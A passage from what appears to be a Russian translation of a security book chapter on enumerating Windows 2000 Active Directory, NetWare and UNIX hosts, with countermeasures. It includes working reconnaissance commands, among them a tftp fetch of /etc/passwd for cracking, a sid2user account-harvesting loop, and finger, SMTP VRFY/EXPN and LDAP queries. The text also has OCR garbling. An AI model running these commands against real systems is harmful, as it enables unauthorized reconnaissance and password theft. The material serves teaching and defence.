    Наиболее существенным изменением, внесенным компанией Microsoft в свою новую операционную систему Win 2000, является добавление в нее службы каталогов, работа которой основана на протоколе LDAP (Lightweight Directory Access Protocol — упрошенный протокол доступа к каталогам). Компания Microsoft называет эту службу активные каталогом (Active Directory). В активном каталоге содержится унифицированное логическое представление всех объектов корпоративной сети. С точки зрения инвентаризации, активный каталог является прекрасным источником извлечения требуемой информации. Среди разнообразных средств поддержки Windows 2000 (которые можно найти на установочном компакт-диске серверной версии в папке Support\Tools) имеется простой клиент LDAP (ldp.exe), предназначенный для администрирования активного каталога.
    Летом 1999 года авторы этой книги принимали участие в тестировании средств обеспечения безопасности системы Windows 2000. При этом было обнаружено, что просто задав для утилиты Idp контроллер домена Win 2000, с помощью простого запроса LDAP можно провести инвентаризацию всех существующих пользователей и групп. Для этого требуется лишь открыть аутентифицированный сеанс на основе протокола LDAP. Если с помощью других средств взломщику удалось получить в свое распоряжение какую-либо учетную запись, то протокол LDAP предоставляет альтернативный механизм инвентаризации пользователей, если заблокированы порты NetBIOS или отсутствуют другие службы.
    В следующем примере иллюстрируется использование утилиты дdp для инвентаризации пользователей и групп контроллера домена bigdc.labfarce.org, имеющего корневой контекст активного каталога oc=labfarce, DC=org. При этом предполагается, что ранее уже был получен пароль учетной записи Guest этого контроллера — guest.


    1. Во-первых, необходимо подключиться к целевому компьютеру с использованием утилиты ldp. Для этого выберите команду Connection>Connect и введите IP-адрес или доменное имя целевого сервера. Можно подключиться к LDAP-порту с номером 389, который используется по умолчанию, или использовать порт 3268 службы глобального каталога. В данном случае применяется порт 389.
    2. После установки соединения необходимо зарегистрироваться в качестве пользователя Guest, данные о котором были получены ранее. Для этого выберите команду Connections>Bind, убедитесь, что установлен флажок Domain и в соответствующем поле введено корректное имя домена, а затем введите имя и пароль, как показано на рисунке.
    3. После успешного открытия сеанса LDAP можно приступать к инвентаризации пользователей и групп. Выберите команду View>Tree и введите в появившемся диалоговом окне корневой контекст (например, dc=labfarce, dc=org).
    4. В левой панели появится новый элемент. После щелчка на символе +, расположенном слева от него, в левой панели под корневым элементом появится несколько основных объектов.
    5. Наконец после двойного щелчка на элементах CN=Users и CN=Builtin в левой панели диалогового окна появится перечень пользователей и встроенных групп сервера, соответственно (рис. 3.4).



    Рис. 3.4. Утилита ldp.exe, средство администрирования активного каталога, позволяет выполнить инвентаризацию пользователей активного каталога через аутентифицированное соединение

    Благодаря чему с помощью простого гостевого подключения можно извлечь подобную информацию? Некоторым службам (таким как RAS и SQL Server) системы NT4, требуется получать информацию об объектах групп и пользователей, содержащуюся в активном каталоге. Процедура установки активного каталога Win 2000 (dcpromo) предоставляет возможность расширить разрешения на доступ к активному каталогу и предоставить их серверам более ранних версий для получения требуемой информации (рис. 3.5). Если в процессе установки был выбран этот режим, то объекты пользователей и групп будут доступны для инвентаризации через протокол LDAP.

    Инвентаризация службы активного каталога: контрмеры



    Первое и самое важное, что необходимо осуществить, это контролировать доступ к TCP-портам с номерами 389 и 3268 по границам сети. Если в ваши задачи не входит предоставление данных активного каталога всему миру, запретите несанкционированный доступ к нему.
    Для того чтобы предотвратить утечку информации в те части сети, у которых нет разрешений на использование дерева активного каталога, ограничьте соответствующим образом эти разрешения. Различие между смешанным режимом (который следует понимать как "менее безопасный") и основным режимом работы системы Win 2000 определяется членством в группе Pre-Windows 2000 Compatible Access, которой по умолчанию предоставлены разрешения на использование активного каталога (см. табл. 3.2).

    Таблица 3.2. Paзрешения на использование бъектов дерева активного калога для группы Pre-Wind ows 2000 Compatible Access

    Объект
    Разрешения
    К каким объектам применяется
    Корневой каталог
    Просмотр содержимого
    К данному и всем дочерним объектам
    Пользователи
    Просмотр содержимого, чтение всех свойств и разрешений
    К объектам пользователей
    Группы
    Просмотр содержимого, чтение всех свойств и разрешений
    К объектам групп

    При выборе режима Permissions compatible with pre-Windows 2000 servers (рис. 3.5) мастером установки активного каталога в группу Pre-Windows 2000 Compatible Access автоматически будет добавлена группа Everyone. В специальную группу Everyone входят все аутентифицированные пользователи. Если группу Everyone удалить из группы Pre-Windows 2000 Compatible Access (а затем перезагрузить контроллеры домена), то домен будет функционировать с более высокой степенью безопасности, что обеспечивается основным режимом работы Windows 2000. Если по каким-либо соображениям требуется снизить уровень защиты, то группу Everyone необходимо добавить снова, запустив в командной строке следующую команду.
    net localgroup "Pre-Windows 2000 Compatible Access" everyone /add



    Рис. З.5. Мастер установки службы активного каталога Win 2000 (dcpromo) предоставляет возможность расширить разрешения на доступ к активному каталогу и предоставить их серверам более ранних версий

    Более подробная информация содержится в статье Q240855 базы данных (Knowledge Base) компании Microsoft, которую можно найти по адресу http: //search.support. microsoft.com.
    Механизм управления доступом, определяемый членством в группе Pre-Windows 2000 Compatible Access, применяется также и к запросам, генерируемым при использовании открытых сеансов NetBIOS. Подтверждением этого может служить следующий пример, где снова используется утилита enum (описанная выше). Первый раз эта утилита запущена для инвентаризации сервера Win 2000 Advanced Server, на котором в группу Pre-Windows 2000 Compatible Access входит группа Everyone.

    D:\Toolbox>enum -U corp-dc
    server: corp-dc
    setting up session... success.
    getting user list (pass 1, index 0)... success, got 7.
    Administrator Guest IUSR_CORP-DC IWAM_CORP-DC krbtgt
    NetShowServices TsInternetUser cleaning up... success.

    Теперь удалим группу Everyone из группы Pre-Windows 2000 Compatible Access, выполним перезагрузку и запустим тот же самый запрос.

    D:\Toolbox>enum -U corp-dc
    server: corp-dc
    setting up session... success.
    getting user list (pass 1, index 0)... fail
    return 5, Access is denied.
    cleaning up... success.

    Серьезно рассмотрите вопрос обновления всех серверов RAS (Remote Access Service— спужба удапенного доступа), RRAS (Routing and Remote Access Service — спужба маршрутизации и удапенного доступа) и SQL и установки на них системы Windows 2000 перед тем, как перейти на испопьзование спужбы активного катапога. Это позвонит забпокировать возможность случайного просмотра информации об учетных записях.



    7.gif

    Изображение: 

    8.gif

    Изображение: 

    9.gif

    Изображение: 

    5. Инвентаризация приложений и идентификационных маркеров



    Инвентаризация приложений и идентификационных маркеров


    Выше были рассмотрены вопросы инвентаризации сети и учетных записей пользователей. При этом для достижения требуемого результата применимы различные средства, встроенные в саму операционную систему. А как насчет получения списка приложений, установленных на компьютере NT/2000? Подобная информация способна значительно расширить знания об исследуемой системе. Процесс подключения к удаленным приложениям и наблюдение за результатами их использования часто называется сбором маркеров (banner grabbing) и может оказаться неожиданно информативным для взломщиков. Если говорить кратко, то в процессе сбора маркеров можно идентифицировать программное обеспечение, запущенное на сервере, и его версию. А этого во многих случаях будет вполне достаточно, чтобы начать поиск уязвимых мест.

    Основы процесса сбора маркеров: утилиты telnet и netcat



    Испытанным и надежным инструментом инвентаризации идентификационных маркеров и приложений как в мире NT, так и в мире UNIX, является утилита telnet. Установив с ее помощью соединение с известным портом исследуемого сервера, нажмите несколько раз клавишу <Enter> и посмотрите полученный результат.

    C:\>telnet www.corleone.com 80
    HTTP/1.0 400 Bad Request Server: Netscape-Commerce/I.12
    Your browser sent a non-HTTP compliant message.

    Этот метод срабатывает для многих популярных приложений, использующих указанный порт (попробуйте его для порта HTTP 80, SMTP 25 или FTP 21, который особенно информативен при исследовании сервера под управлением Windows).
    Если вам нужен инструмент для более тщательных исследований, попробуйте "швейцарский армейский нож" протокола TCP/IP — утилиту netcat, которая изначально была написана хакером Хоббитом (Hobbit, http: //www.avian.org), а затем перенесена на платформу NT Вельдом Пондом (Weld Pond) из группы LOpht, занимающейся исследованиями в области безопасности (иными словами — это хакеры, являющиеся "хорошими парнями"). Утилиту netcat можно найти по адресу http://www.10pht.com/-weld/netcat/index.html. Это еще одна утилита, которая вполне заслуживает места на Аллее Славы любого администратора NT. С другой стороны, это означает, что когда ею пользуется злоумышленник, последствия могут оказаться поистине разрушительными. Ниже мы рассмотрим один из простейших примеров применения утилиты netcat — подключение к TCP-порту удаленного компьютера. 

    C:\>nc -v www.corleone.com 80 
    www.corleone.com [192.168.45.7] 80 (?) open

    В таких ситуациях ввод даже небольшого количества данных приводит к получению отклика со стороны удаленного узла. В данном случае, при нажатии клавиши <Enter> мы получим следующие результаты.

    НТТР/1.1 400 Bad Request
    Server: Microsoft-IIS/4.О
    Date: Sat, 03 Apr 1999 08:42:40 GMT
    Content-Type: text/html
    Content-Length: 87
    <html><headxtitle>Error</title></headxbody>
    The parameter is incorrect. </bodyx/html>

    Полученная информация способна существенно сузить область поиска подходов к проникновению в исследуемую систему. Теперь, когда известен производитель и версия программного обеспечения Web-сервера, взломщики могут сосредоточиться на методах, специфичных для данной платформы, и перебирать хорошо проверенные приемы до тех пор, пока один из них не достигнет цели. Таким образом, время начинает работать на злоумышленника, а не в пользу администратора. Мы еще не раз остановимся на методах применения утилиты netcat, в том числе и для извлечения дополнительной информации при инвентаризации UNIX. Этот вопрос будет рассматриваться в следующем разделе.

    Сбор идентификационных маркеров NT/2000: контрмеры



    Защита от такого рода попыток проведения инвентаризации требует от администратора некоторой доли изобретательности. Однако мы не можем определить с достаточной степенью определенности, насколько важна для взломщиков информация о приложениях и службах, работающих в вашей сети.
    Во-первых, проверьте все важные приложения и попытайтесь найти способ, с помощью которого можно было бы предотвратить предоставление информации о производителе и номере версии в идентификационных маркерах. Регулярно проверяйте свою сеть, сканируя порты и подключаясь с помощью утилиты netcat к выявленным активным портам, чтобы убедиться в том, что из сети не уходит даже незначительная часть информации, которая может представлять интерес для потенциального взломщика.

    Инвентаризация системного реестра NT/2000



    Другой механизм получения информации о приложениях NT/2000 подразумевает получение копии содержимого системного реестра исследуемого компьютера. Практически все современные приложения, корректно установленные на компьютере NT, оставляют более или менее заметные "следы" в системном реестре. Требуется лишь знать, где производить поиск требуемой информации. Кроме того, злоумышленник, получивший доступ к системному реестру, может почерпнуть из него немало сведений о пользователях и параметрах конфигурации. Запасшись изрядной долей терпения, в лабиринте ульев можно обнаружить сведения, которые позволят получить доступ к нужной информации. К счастью, в системе NT/2000 доступ к системному реестру по умолчанию разрешен лишь администраторам (по меньшей мере в ее версии для сервера). Таким образом, описываемый ниже метод обычно неприменим при использовании анонимных нулевых соединений. Однако из этого правила существует одно исключение, когда в ключе HKLM\System\Current-ControlSet\Control\SecurePipeServer\ Winreg\AllowedPaths заданы другие параметры, открытые для доступа посредством нулевых сеансов. В этом случае по умолчанию доступ разрешен к ключу HKLM\software\Microsoft\windowsNT\ CurrentVersion.
    Для выполнения этой задачи можно воспользоваться либо утилитой regdmp, входящей в состав NTRK, либо уже известной нам утилитой DumpSec компании Somarsoft.
    Возможности утилиты regdmp весьма ограничены и, по сути дела, сводятся к получению дампа всего системного реестра (или отдельных ключей, заданных в командной строке). Хотя обычно удаленный доступ к системному реестру разрешен только администраторам, зловредные хакеры, как правило, все же пытаются получить ключи, надеясь, что им повезет. Ниже приведен пример запроса, в результате которого можно выяснить, какие приложения автоматически запускаются при загрузке системы Windows. Зачастую хакеры помешают в этот ключ ссылки на утилиты, организующие скрытый вход в систему, например утилиту NetBus (см. главы 5 и 14).

    С:\> regdmp -m \\192.168.202.33
    HKEY_LOCAL_MACHINE\SOFTWARE\
    Microsoft\Windows\CurrentVersion\Run

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
    CurrentVersion\Run
    SystemTray = SysTray.Exe
    BrowserWebCheck = loadwc.exe

    Программа DumpSec позволяет получить результат в более привлекательной форме (рис. 3.6), однако в большинстве случаев он ничем не отличается от результатов применения утилиты regdmp. В отчете утилиты DumpSec содержатся сведения обо всех службах и драйверах ядра Win32 удаленной системы, как работающих, так и не работающих (в соответствии с установленными разрешениями). Полученная информация может подсказать злоумышленнику, в каком направлении необходимо сосредоточить усилия при планировании вторжения и его реализации. Не забывайте о том, что при использовании программы DumpSec требуется открытие нулевого сеанса.



    Рис. 3.6. Утилита DumpSec позволяет получить информацию обо всех службах и драйверах, запушенных на удаленном компьютере

    Контрмеры против сбора идентификационных маркеров и инвентаризации системного реестра



    Убедитесь, что системный реестр заблокирован и к нему нельзя получить доступ с использованием удаленных соединений. Для этого необходимо проверить возможность удаленного доступа к ключу HKLM\System\CurrentControlSet\SecurePipe Servers \winreg и всем связанным с ним подключам. Если этот ключ присутствует, то по умолчанию удаленный доступ к реестру разрешен лишь администраторам. Этот ключ по умолчанию присутствует только в версии Win NT/2000, предназначенной для сервера, но не для рабочей станции. В дополнительных подключах задаются определенные пути системного реестра, разрешающие доступ независимо от политики обеспечения безопасности, принятой для ключа winreg. Более подробная информация об этом приведена в статье Q155363 базы данных компании Microsoft, которую можно найти по адресу http://search.support.microsoft.com. Кроме того, воспользуйтесь каким-нибудь хорошим средством, например программой DumpSec, и удостоверьтесь в отсутствии утечки информации.


    10.gif

    Изображение: 

    6. Позвольте сценариям выполнить всю работу



    Позвольте сценариям выполнить всю работу


    Вы подробно познакомились с ручными методами, которые взломщик может предпринять для инвентаризации сети, пользователей и получения данных о приложениях. Вполне понятно, что многие после прочтения материала, приведенного выше, забеспокоились и сразу же приступили к тестированию своих сетей на предмет поиска уязвимых мест. Однако это может оказаться трудноразрешимой задачей, если ваша сеть большого размера с множеством серверов. К счастью, большинство из описанных в данном разделе средств можно запускать из командной строки и, следовательно, легко автоматизировать их использование с помощью простых командных сценариев или других приемов.
    Далее приводится простой пример сценария для команд user2sid/sid2user, рассмотренных выше. Как уже упоминалось, для возможности использования такого сценария сначала необходимо определить идентификатор S1D исследуемой системы, воспользовавшись утилитой user2sid и нулевым сеансом. Вспомните, что в системе NT/2000 новым учетным записям назначаются идентификаторы RID, начиная с 1000. Затем для получения данных о пятидесяти учетных записях можно воспользоваться следующим циклом, реализовав его с помощью оператора оболочки FOR и команды sid2user. 

    C:\>for /L %i
    IN (1000,1,1050) DO sid2user \\acmepdcl 5 21
    1915163094

    1258472701648912389 %I » users.txt
    C:\>cat users.txt
    Name is IUSR_ACMEPDC1
    Domain is ACME
    Type of SID is SidTypeUser
    Name is MTS Trusted Impersonators
    Domain is ACME
    Type of SID is SidTypeAlias

    Полученные результаты можно сократить, подав их на вход фильтра и оставив таким образом лишь список имен пользователей. Конечно, среда написания сценариев не ограничивается лишь командной оболочкой системы NT. Для этих целей удобно пользоваться также языками Perl, VBScript или другими средствами. Еще стоит упомянуть о том, что с помощью приведенного сценария можно успешно извлечь список пользователей, если на исследуемом узле открыты TCP-порты 139 или 445, а также не установлено значение для параметра RestrictSnonymous.
    Имея под рукой всю информацию, собранную с помощью описанных на данный момент средств, взломщик может перейти к активному проникновению в систему NT, как описано в главе 5, либо в систему Win 2000, как вы увидите в главе 6.


    7. Инвентаризация Novell



    Инвентаризация Novell


    Система Windows NT/2000 не одинока в наличии такого "порока", как нулевой сеанс. У сетевой операционной системы Novell NetWare имеется еще более серьезная проблема. Она состоит в том, что NetWare практически не заботится о защите информации, предоставляя ее кому угодно без какой-либо аутентификации сервером или деревом. Серверы NetWare 3.x и 4.x (с включенным контекстом Bindery (связки)) имеют так называемый изъян "присоединения" (attach), позволяющий любому желающему получить информацию о серверах, деревьях, группах, принтерах и пользовательских именах без регистрации на каком-либо сервере. В данном разделе мы покажем на практике, как это сделать, а затем дадим рекомендации по устранению этих недостатков.


    8. Сетевое окружение



    Сетевое окружение


    Первый этап инвентаризации сети NetWare состоит в получении данных о соединенных друг с другом серверах и деревьях. Это можно сделать различными способами, однако проще всего воспользоваться средством Network Neighborhood систем Windows 95/98/NT. Эта удобная утилита просмотра сетевых ресурсов обеспечивает возможность опрашивания всех серверов NetWare и деревьев NDS, с которыми имеется физическое соединение (рис. 3.7), хотя необходимо отметить, что вы не сможете просмотреть структуру дерева, не зарегистрировавшись в самом дереве. Конечно, данный факт сам по себе не угрожает информации, однако он показывает, что если каждый шаг можно выполнить столь просто, то и вся дистанция не покажется такой уж сложной.



    Рис. 3.7. Для инвентаризации серверов и деревьев NetWare достаточно воспользоваться окном просмотра сетевого окружения Windows

    Соединения с использованием клиента Client32



    Программа управления службами Novell NetWare Services, представленная пиктограммой в системной области панели задач, позволяет управлять подключениями к NetWare с помощью команды NetWare Connections, как показано ниже.
    Эта возможность чрезвычайно полезна для управления подключениями к сети и регистрацией на сервере. Однако в то же время она и опасна, поскольку после создания подключения можно получить все дерево NDS с сервера, на котором оно хранится, номер соединения и полный сетевой адрес, включая адреса сети и узла, как показано на рис. 3.8.
    Эти сведения могут помочь при последующей установке соединения с сервером и получении административных привилегий (см. главу 7).




    Рис. 3.8. Утилита NetWare Connections отображает дерево NDS, в которое входит сервер, номер соединения и полный сетевой адрес, включая адреса сети и узла

    Просмотр серверов NetWare с помощью On-Site Admin



    Не проходя аутентификации ни на одном сервере, можно просмотреть состояние любого сервера сети, воспользовавшись утилитой Novell On-Site Admin (ftp://ftp.cdrom.com). Вместо широковещательной рассылки сообщений эта утилита отображает сведения о серверах, хранящиеся в локальном буфере утилиты просмотра сетевого окружения. Эта утилита периодически обновляет свой буфер, рассылая по сети широковещательные сообщения серверам' NetWare. На рис. 3.9 показан пример того, как много информации можно получить с помощью утилиты On-Site Admin.



    Рис. 3.9. Утилита On-Site Admin — наиболее мощное средство, позволяющее выполнить инвентаризацию сети NetWare

    Программа On-Site Admin позволяет выполнять также и анализ, как показано на рис. 3.10. Выбрав сервер и щелкнув на кнопке Analyze, можно получить исчерпывающую информацию о томе NetWare.
    Конечно, эта информация не потрясет основы мирозданья — она является лишь дополнением данных, полученных из различных источников. В процессе анализа утилита On-Site Admin устанавливает соединение с исследуемым сервером, что и продемонстрировано на следующей иллюстрации с помощью утилиты NetWare Connections.



    Рис. 3.10. Утилита On-Site Admin позволяет получить информацию о томе


    11.gif

    Изображение: 

    12.gif

    Изображение: 

    13.gif

    Изображение: 

    14.gif

    Изображение: 

    15.gif

    Изображение: 

    16.gif

    Изображение: 

    9. Просмотр дерева с помощью утилиты On-Site Admin



    Просмотр дерева с помощью утилиты On-Site Admin



    С помощью утилиты On-Site Admin можно также просмотреть всю информацию большинства деревьев NDS вплоть до их листьев. В этом случае клиент Client32 просто подключается к выбранному в дереве серверу (см. рисунок выше). Возможно это потому, что по умолчанию NetWare 4.x позволяет просматривать дерево любому желающему. Эту опасность можно устранить, добавив в корень дерева фильтр наследования прав (IRF — inheritance rights filter). Содержащаяся в дереве NDS информация является очень важной, поэтому нельзя разрешать просматривать ее кому попало, поскольку при его просмотре можно получить сведения о пользователях, группах, серверах и томах (рис. 3.11).



    Рис. 3.11. Утилита On-Site Admin позволяет просматривать информацию дерева NDS вплоть до его листьев

    Получив всю информацию, о которой говорилось в данном разделе, злоумышленник может перейти к активным действиям по проникновению в систему, о которых мы поговорим в главе 7.


    17.gif

    Изображение: 

    10. Инвентаризация UNIX



    Инвентаризация UNIX


    Большинство современных реализаций системы UNIX основываются на стандартных средствах обеспечения сетевой безопасности протокола TCP/IP. Благодаря этому они не так щедро раздают всем желающим информацию о сети, как система NT, в которой используется унаследованный от предыдущих версий интерфейс NetBIOS, или система NetWare, работа которой основывается на собственном механизме безопасности компании Novell. Естественно, это вовсе не означает, что система UNIX является неуязвимой, а ее сетевые ресурсы не могут подвергнутся инвентаризации. Все зависит от конфигурационных параметров системы. Например, службы RFC (Remote Procedure Call — удаленный вызов процедур), N1S (Network Information Service — сетевая информационная служба) и NFS (Network File System — сетевая файловая система), преимущества которых очень часто используют разработчики, являются излюбленными "мишенями" для взломщиков на протяжении уже многих лет. Ниже вы познакомитесь с некоторыми классическими методами инвентаризации UNIX (другими словами, старые и проверенные способы, которые, по-видимому, практически всегда будут срабатывать).
    Не забывайте о том, что большинство из описываемых в данном разделе приемов основывается на информации, полученной при сканировании портов и определении типа и версии операционной системы, о чем рассказывалось в предыдущих главах.

    Инвентаризация сетевых и совместно используемых ресурсов UNIX



    Лучшими источниками информации о сети UNIX являются базовые методы исследования стека протоколов TCP/IP, которые рассматривались в главе 2. Среди других средств можно выделить утилиту showmount, которую можно использовать для инвентаризации экспортируемых в сети файловых систем NFS. Например, предположим, что в результате сканирования стало известно, что на исследуемом компьютере в состоянии ожидания запросов находится порт 2049 (NFS). В этом случае с помощью утилиты showmount можно выяснить, какие именно каталоги являются совместно используемыми.

    showmount -e 192.168.202.34
    export list for 192.168.202.34:
    /pub (everyone)
    /var (everyone)
    /usr user

    Использование параметра -е позволяет получить список экспортируемых файловых систем сервера NFS. К сожалению, архитектура NFS в данном случае не позволяет противопоставить каких-либо защитных мер запросам такого рода. Можно лишь посоветовать, чтобы доступ к экспортируемой файловой системе выполнялся в соответствии с установленными разрешениями (операции чтения и записи должны быть разрешены только для строго определенных узлов), а доступ к NFS блокировался бы извне с помощью брандмауэра (порт 2049). Запросы утилиты showmount тоже можно регистрировать в системе. Это облегчает обнаружение взломщика.
    Сейчас в мире UNIX система NFS является не единственным примером программного обеспечения, с помощью которого обеспечивается совместное использование данных. В настоящее время возрастает популярность пакета Samba, разработанного в рамках модели открытого кода. Этот пакет обеспечивает клиентам SMB возможность совместного использования файлов и принтеров. Как уже упоминалось, протокол SMB (Server Message Block) представляет собой основу для работы в сети клиентов Windows. Пакет Samba можно получить по адресу http://www.samba.org (его можно найти в комплекте поставки большинства версий операционной системы Linux). Хотя в файле настройки сервера Samba (/etc/smb.conf) используются довольно простые параметры обеспечения безопасности, необходимо относится к ним внимательно, поскольку их неправильная настройка может привести к нарушению защиты совместно используемых сетевых ресурсов.
    Еще одним потенциальным источником информации о сети UNIX является служба NIS. Она служит ярким примером плохой реализации хорошей идеи (поддержка распределенной базы данных сетевой информации). С точки зрения обеспечения безопасности основной проблемой службы NIS является то, что, узнав доменное имя сервера NIS, с помощью простого запроса RPC можно получить любую из карт NIS (тар). Карты NIS — это файлы данных, в которых содержится важная информация каждого узла домена, например содержимое файлов паролей. Традиционное проникновение в сеть с использованием службы NIS предусматривает применение клиента N1S для попытки подбора доменного имени. Для достижения этой цели может служить и утилита pscan, написанная хакером Плювиусом (Pluvius). Ее можно найти во многих хакерских архивах Internet. Для того чтобы с помощью утилиты pscan получить всю необходимую информацию, ее необходимо запустить с параметром -n.
    Если вы используете службу NIS, то, по крайней мере, не применяйте легко угадываемое доменное имя (в котором используется название компании, имя DNS и т.д.). Подобрав доменное имя, хакер без труда может получить всю необходимую информацию, включая базу данных паролей. Если вы не планируете переходить на использование службы NIS+ (которая поддерживает режим шифрования данных и аутентификации через защищенные запросы RPC), то хотя бы отредактируйте файл /var/yp/securenets и ограничьте доступ к определенным узлам и сетям, либо откомпилируйте утилиту ypserv с включенной поддержкой TCP-оболочек. Кроме того, не помещайте в таблицы NIS информацию о системной записи root и других системных учетных записях.
    Как уже отмечалось в предыдущих разделах этой главы, протокол SNMP позволяет взломщикам получить много важной информации о системе UNIX, в которой запущен агент SNMP. Если в сети используются строки доступа, заданные по умолчанию, то в процессе сбора данных чрезвычайно полезной может оказаться утилита snmpwalk, входящая в состав утилит SNMP многих систем UNIX.

    Инвентаризация пользователей  и групп UNIX



    Возможно, самым старым приемом инвентаризации учетных записей пользователей, описанных в данной книге, является утилита finger. Эта утилита предоставляла простой и удобный способ получения информации о пользователях удаленного узла еще в те времена, когда сеть Internet не была настолько большой и простой в использовании. Мы упоминаем здесь об этой утилите в основном для того, чтобы акцентировать ваше внимание на основных способах ее использования. Многие средства проникновения в сеть по-прежнему базируются на использовании этой утилиты, поскольку нерадивые системные администраторы зачастую запускают системный процесс fingerd без каких-либо мер обеспечения безопасности. Как и прежде, мы предполагаем, что в процессе сканирования портов была получена информация о том, что на исследуемом узле запущена служба finger (порт 79).

    [root$]finger -I @target.hackme.com
    [target.hackme.com]
    Login: root Name: root
    Directory: /root Shell: /bin/bash
    On since Sun Mar 28 11:01 (PST) on ttyl 11 minutes idle
    (messages off)
    On since Sun Mar 28 11:01 (PST) on ttypO from :0.0
    3 minutes 6 seconds idle
    No mail.
    Plan:
    John Smith Security Guru Telnet password is my birthdate.

    Команда finger 0@имя-узла также позволяет получить интересный результат. 

    [root$]finger 00192.168.202.34
    [192.168.202.34]
    Line User Host(s) Idle Location
    * 2 vty 0 idle 0 192.168.202.14
    SeO Sync PPP 00:00:02

    Как легко заметить, большая часть информации, которая отображается утилитой finger, не имеет особого значения (она выбирается из соответствующих полей файла /etc/password). Можно сказать, что с точки зрения безопасности самой опасной является информация об именах пользователей, зарегистрированных в системе, а также о времени, в течение которой пользователь не выполняет каких-либо операций (idle). Это поможет хакеру определить, кто в данный момент "присматривает" за машиной (возможно, пользователь root?) и насколько внимательно он это делает. Некоторая дополнительная информация может использоваться при попытке проникновения в сеть с помощью приемов социальной инженерии. (Социальная инженерия (social engineering) — термин из словаря хакера, обозначающий попытку с помощью психологических приемов установить контакт с нужными людьми с целью получения от них информации для проникновения в систему. Более подробная информация об этом содержится в главе 14, "Расширенные методы".) Как показано в этом примере, пользователи, которые помещают в свой рабочий каталог файлы .plan или .project, могут дать очень хорошую наводку хакеру (содержимое этих файлов выводится командой finger).
    Обнаружить и устранить подобную утечку информации очень просто. Достаточно не запускать демон fingerd (для этого нужно закомментировать соответствующую строку в файле inetd.conf и выполнить команду killall -HUP inetd), а также заблокировать порт 79 на брандмауэре. Если вам по каким-то причинам все же необходимо иметь доступ к программе finger, используйте TCP-оболочки (см. главу 8, "Хакинг UNIX"), чтобы ограничить доступ к узлу и регистрировать все соответствующие события. Можно также воспользоваться модифицированным демоном finger, предоставляющим ограниченное количество информации.
    Существуют также и другие, менее популярные утилиты, например rusers и rwho. Как и в случае с программой finger, от них лучше отказаться (обычно эти утилиты запускаются независимо от демона inetd). Поищите в файлах загрузки ссылки на файлы rpc.rwhod и rpc.rusersd). Утилита rwho возвращает перечень пользователей, которые в данный момент зарегистрированы на удаленном узле,

    rwho 192.168.202.34
    root localhost:ttypO Apr 11 09:21
    jack beanstalk:ttypl Apr 10 15:01
    jimbo 192.168.202.77:ttyp2 Apr 10 17:40

    При использовании параметра -1 утилита rusers позволяет получить более подробную информацию. Кроме сведений о пользователях она предоставляет данные о времени, прошедшем после последнего нажатия пользователем клавиш на клавиатуре,

    rusers -1 192.168.202.34
    root 192. 168..202.34:ttyl Apr 10 18:58 :51
    root 192.168.202.34:ttypO Apr 10 18:59 :02 (:0.0)

    Еще один классический метод инвентаризации основан на использовании универсального средства почтовой доставки Internet — протокола SMTP (Simple Mail Transfer Protocol). Этот протокол поддерживает две встроенные команды, которые позволяют выполнять инвентаризацию пользовательских учетных записей. Команда VRFY подтверждает, что введенное имя имеется в системе, а команда EXPN отображает реальный адрес доставки письма вместо псевдонима или списка рассылки. Хотя в настоящее время многие компании и так достаточно свободно предоставляют информацию об электронных адресах, разрешение подобной деятельности на почтовом сервере может дать взломщику ценную информацию о пользователях, а также предоставить ему возможность фальсификации.

    telnet 192.168.202.34 25
    Trying 192.168.202.34...
    Connected to 192.168.202.34.
    Escape character is -'^]'.
    220 mail.bigcorp.com ESMTP Sendmail
    8.8.7/8.8.7; Sun, 11 Apr 1999
    10:08:49 -0700
    vrfy root
    250 root <root@bigcorp.com>
    expn adm
    250 adm <adm@bigcorp.com>
    quit
    221 mail.bigcorp.com closing connection

    Это еще один пример того, что нужно всегда помнить о старых хакерских приемах и вовремя отключать соответствующие режимы. Популярная программа sendmail, предназначенная для обмена информацией с использованием протокола SMTP (http://www.sendmail.org), начиная с версии 8, поддерживает синтаксис, который позволяет поместить в файл mail.cf параметры, запрещающие подобные команды или требующие аутентификации. Другие реализации SMTP-сервера должны предоставлять аналогичные возможности. Если это не так, замените программу!
    Конечно, самым старым и излюбленным приемом хакеров UNIX является попытка получения файла /etc/passwd, о чем мы подробно будем говорить в главе 8., "Хакинг UNIX". Сейчас же необходимо отметить, что один из наиболее популярных методов получения этого файла состоит в использовании протокола TFTP (Trivial File Transfer Protocol — простой протокол передачи файлов).

    tftp 192.168.202.34
    tftp> connect 192.168.202.34
    tftp> get /etc/passwd /tmp/passwd.cracklater
    tftp> quit

    Помимо того, что в данном примере взломщику удалось получить файл паролей, которые он может попытаться взломать в любой момент, прямо из этого файла он может получить информацию о пользователях. Решение данной проблемы состоит в том, чтобы вообще отказаться от протокола TFTP. В тех же случаях, когда это действительно необходимо, упаковывайте передаваемые по этому протоколу пакеты данных, ограничьте доступ к каталогу /tftpboot и убедитесь, что протокол заблокирован на уровне пограничного брандмауэра.

    Инвентаризация приложений и идентификационных маркеров



    Как и любой другой сетевой ресурс, приложения должны иметь возможность обмениваться друг с другом информацией по сети. Одним из самых популярных протоколов, разработанных для обеспечения этого процесса, является протокол RPC (Remote Procedure Call). На основе RPC работает программа rpcbind, основная задача которой состоит в посредничестве между запросами клиентов и портами, которые эта программа динамически назначает находящимся в режиме ожидания приложениям. Несмотря на постоянную головную боль, которую много лет вызывают у администраторов брандмауэров подобные программы, служба RPC остается чрезвычайно популярным механизмом. Существует утилита rpcinfo, которая, подобно программе finger, может применяться для инвентаризации приложений RPC, находящихся в состоянии ожидания запроса на удаленном узле. Обычно для того чтобы воспользоваться этой утилитой, во время сканирования достаточно установить, что открыт порт 111 (rcbind) или 32771 (вариант утилиты от компании Sun).

    rpcinfo -p 192.168.202.34
    program vers proto port
    100000 2 tcp 111 rpcbind
    100002 3 udp 712 rusersd
    100011 2 udp 754 rquotad
    100005 I udp 635 mountd
    100003 2 udp 2049 nfs
    100004 2 tcp 778 ypserv

    Из полученных результатов можно заключить, что на данном узле запущен системный процесс rusersd, программное обеспечение служб NFS и NIS (ypserv — сервер службы NIS). Таким образом, с помощью команд rusers, shomount -e и pscan -n можно попытаться получить более подробную информацию. Кроме того, для инвентаризации можно также воспользоваться утилитой pscan (упоминавшейся выше) с параметром -г.
    Утилиту, аналогичную rpcinfo, можно применять и в системе Windows NT. Эта утилита, написанная Дэвидом Литчфилдом (David Litchfield) называется rpcdump. Как видно из следующего примера, утилита rpcdump ведет себя аналогично rpcinfo с параметром -р.

    D:\Toolbox>rpcdump 192.168.202.105
    Program no. Name Version Protocol Port
